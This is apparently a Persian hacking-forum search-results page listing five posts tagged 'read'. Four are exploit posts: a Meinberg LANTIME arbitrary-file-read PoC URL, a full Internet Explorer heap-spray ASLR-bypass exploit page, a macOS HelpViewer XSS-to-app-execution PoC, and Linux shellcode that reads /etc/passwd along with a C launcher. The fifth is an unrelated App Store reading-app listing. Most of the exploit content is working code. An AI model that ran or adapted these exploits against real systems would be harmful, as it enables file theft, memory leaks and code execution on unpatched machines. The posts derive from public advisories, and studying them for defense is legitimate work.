رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'read'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

5 نتیجه پیدا شد

  1. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  2. Soft-Apple

    بازی 300+ Sight Words, Learn to Read A+ 300+ Sight Words, Learn to Read on the App Store
  3. <!-- CVE-2015-6086 Out Of Bound Read Vulnerability Address Space Layout Randomization (ASLR) Bypass Improper handling of new line and white space character caused Out of Bound Read in CDOMStringDataList::InitFromString. This flaw can be used to leak the base address of MSHTML.DLL and effectively bypass Address Space Layout Randomization. Affected Version: Internet Explorer 9 Internet Explorer 10 Internet Explorer 11 Test Bed: IE: 10 & 11 KB: KB3087038 OS: Windows 7 SP1 x86 Advisory: http://www.payatu.com/advisory-ie_cdomstringdatalist/ https://technet.microsoft.com/library/security/MS15-112 http://www.zerodayinitiative.com/advisories/ZDI-15-547/ Copyright 2016 © Payatu Technologies Pvt. Ltd. Author: Ashfaq Ansari Email: ashfaq[at]payatu[dot]com Websites: www.payatu.com www.nullcon.net www.hardwear.io www.null.co.in This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --> <!DOCTYPE html> <html> <head> <title>IE 10-11 Windows 7 SP1 x86 - OOB Read ALSR Bypass PoC</title> <meta http-equiv="pragma" content="no-cache"/> <meta http-equiv="expires" content="0"/> <script type="text/javascript"> /** * This function is used to create string of desired size. * * @param character * @param size * @returns {string} */ function createString(character, size) { while (character.length < size) { character += character; } // BSTR structure // header | unicode string | NULL terminator // 4 bytes | sizeof(string) * 2 | 2 bytes return character.substr(0, (size - 6) / 2); } /** * This function is used to get the Internet Explorer's version. * * @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie * @returns {int | null} */ function getInternetExplorerVersion() { var userAgent = window.navigator.userAgent; var msie = userAgent.indexOf('MSIE'); if (msie > 0) { return parseInt(userAgent.substring(msie + 5, userAgent.indexOf('.', msie)), 10); } var trident = userAgent.indexOf('Trident/'); if (trident > 0) { var rv = userAgent.indexOf('rv:'); return parseInt(userAgent.substring(rv + 3, userAgent.indexOf('.', rv)), 10); } var edge = userAgent.indexOf('Edge/'); if (edge > 0) { return parseInt(userAgent.substring(edge + 5, userAgent.indexOf('.', edge)), 10); } return null; } /** * This function is used to leak the base address of MSHTML.DLL. * * @param offsetOfMSHTMLBaseAddress */ function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) { // Step 1: Let's do some clean up CollectGarbage(); var eventArray = new Array(); var polyLineArray = new Array(); var exploitSuccessful = false; // Step 2: As the target object is stored in Process Heap // instead of Isolated Heap, we can use any element that // is stored on Process Heap to spray the Heap. // // To create a predictable pattern on Heap, we spray using // "MsGestureEvent" and it's size is 0x0A0. We will use // this object to read the VFTable pointer. for (var i = 0; i < 0x1000; i++) { eventArray[i] = document.createEvent('MsGestureEvent'); } // Step 3: Now we need to create a hole in the allocation // that we made earlier. The purpose of this hole is to // allocate the vulnerable buffer just before the Heap // chunk of "MsGestureEvent" for (i = 1; i < 0x500; i += 2) { eventArray[i] = null; } // Step 4: As Memory Protector is enabled by default on all // versions of IE, it will not allow the free of objects // instantly. So, we need to force free the memory due to // Delayed Frees. CollectGarbage2(); // Step 5: Now, fill the hole that we created earlier. The // "requiredFeatures" property is allocated on OLEAUT32 Cache // Heap, old Plunger technique does not seems to work for me. // I have used a neat trick to bypass OLEAUT32 Cache Heap. for (i = 0; i < 0x250; i++) { polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline'); // Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0)); // Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap. polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0)); // Step 8: As the whole exploitation depends on certain Heap // layout, thus, this is unreliable. But to overcome this // un-reliability, I'm reloading the page until, right Heap // Layout is achieved. // // This PoC is created for the vendor to acknowledge this bug, // hence reliability is not my concern at this moment. We can // make it more reliable, but let's leave it for later stage. // // Some heuristics to detect if Heap is in the right state. // Once we have determined the Heap state, we can apply some // more heuristics. if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) { // Step 9: Read the Out of Bound memory var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1)); // Step 10: Some more heuristics var spitValue = OOBReadMemory.split('%'); var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', '')); var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress; // Step 11: Show the message to user var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16); message += '\n'; message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16); alert(message); // Step 12: Exploit successful exploitSuccessful = true; break; } } // Step 13: As stated earlier, this is a bit unreliable. // If the exploit has failed, reload the current page. // If reloading does not help, close the browser and // launch the exploit multiple times. if (!exploitSuccessful) { window.location.reload(); } } /** * This function is used fill the wait list of the freed objects * and trigger Garbage Collection. */ function CollectGarbage2() { // Microsoft implemented Memory Protector to mitigate // Use after Free vulnerabilities. The object protected // by Memory Protector won't be freed directly. Instead, // it will be put into a wait list which will be freed // when it reaches certain threshold (i.e 100,000 bytes). var video = new Array(); // Now allocate video element (400 bytes) 250 times // // Note: We are not using stack to store the references. // If we use stack to store the references, the memory // will never be freed during Mark and Reclaim operation for (var i = 0; i < 250; i++) { video[i] = document.createElement('video'); } // Now free the elements. It will be put into the wait list. video = null; // Reclaim the memory by triggering Garbage Collection CollectGarbage(); } /** * This function is used to launch the exploitation by leaking * the base address of MSHTML.DLL. */ function LaunchExploit() { var browserSupported = false; var ieVersion = getInternetExplorerVersion(); var offsetOfMSHTMLBaseAddress = null; if (ieVersion == 11) { // If you are getting a wrong base address, please update this value // offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress offsetOfMSHTMLBaseAddress = 0x0002ebe8; browserSupported = true; } else if (ieVersion == 10) { // If you are getting a wrong base address, please update this value // offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress offsetOfMSHTMLBaseAddress = 0x0000d270; browserSupported = true; } else { alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)'); } // Launch the exploit if (browserSupported) { LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress); } } </script> </head> <body onload='LaunchExploit();'> </body> </html>
  4. <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). --> <script> /* OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). */ function main() { function second() { var f = document.createElement("iframe"); f.onload = () => { f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app"; }; f.src = "help:openbook=com.apple.safari.help"; document.documentElement.appendChild(f); } var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();"; document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url; } main(); </script>
  5. Hacking

    /* [+] Author : B3mB4m [~] Contact : [email protected] [~] Project : https://github.com/b3mb4m/Shellsploit [~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu #If you want test it, you must compile it within x86 OS. #Or basically you can get it with shellsploit. #Default setthings for /etc/passwd 00000000 31C0 xor eax,eax 00000002 40 inc eax 00000003 743A jz 0x3f 00000005 31C9 xor ecx,ecx 00000007 31C0 xor eax,eax 00000009 31D2 xor edx,edx 0000000B 51 push ecx 0000000C B005 mov al,0x5 0000000E 6873737764 push dword 0x64777373 00000013 68632F7061 push dword 0x61702f63 00000018 682F2F6574 push dword 0x74652f2f 0000001D 89E3 mov ebx,esp 0000001F CD80 int 0x80 00000021 89D9 mov ecx,ebx 00000023 89C3 mov ebx,eax 00000025 B003 mov al,0x3 00000027 66BAFF0F mov dx,0xfff 0000002B 6642 inc dx 0000002D CD80 int 0x80 0000002F 31C0 xor eax,eax 00000031 31DB xor ebx,ebx 00000033 B301 mov bl,0x1 00000035 B004 mov al,0x4 00000037 CD80 int 0x80 00000039 31C0 xor eax,eax 0000003B B001 mov al,0x1 0000003D CD80 int 0x80 0000003F EB3F jmp short 0x80 00000041 5F pop edi 00000042 80770B41 xor byte [edi+0xb],0x41 00000046 48 dec eax 00000047 31C0 xor eax,eax 00000049 0402 add al,0x2 0000004B 48 dec eax 0000004C 31F6 xor esi,esi 0000004E 0F05 syscall 00000050 6681ECFF0F sub sp,0xfff 00000055 48 dec eax 00000056 8D3424 lea esi,[esp] 00000059 48 dec eax 0000005A 89C7 mov edi,eax 0000005C 48 dec eax 0000005D 31D2 xor edx,edx 0000005F 66BAFF0F mov dx,0xfff 00000063 48 dec eax 00000064 31C0 xor eax,eax 00000066 0F05 syscall 00000068 48 dec eax 00000069 31FF xor edi,edi 0000006B 40 inc eax 0000006C 80C701 add bh,0x1 0000006F 48 dec eax 00000070 89C2 mov edx,eax 00000072 48 dec eax 00000073 31C0 xor eax,eax 00000075 0401 add al,0x1 00000077 0F05 syscall 00000079 48 dec eax 0000007A 31C0 xor eax,eax 0000007C 043C add al,0x3c 0000007E 0F05 syscall 00000080 E8BCFFFFFF call dword 0x41 00000085 2F das 00000086 657463 gs jz 0xec 00000089 2F das 0000008A 7061 jo 0xed 0000008C 7373 jnc 0x101 0000008E 7764 ja 0xf4 00000090 41 inc ecx 00000091 2F das 00000092 657463 gs jz 0xf8 00000095 2F das 00000096 7061 jo 0xf9 00000098 7373 jnc 0x10d 0000009A 7764 ja 0x100 */ //Project : https://github.com/b3mb4m/Shellsploit //This file created with shellsploit .. //19/01/2016 - 00:29:31 //Compile : gcc -fno-stack-protector -z execstack shell.c -o shell unsigned char shellcode[] = "\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; int main(void){ (*(void(*)()) shellcode)(); }
×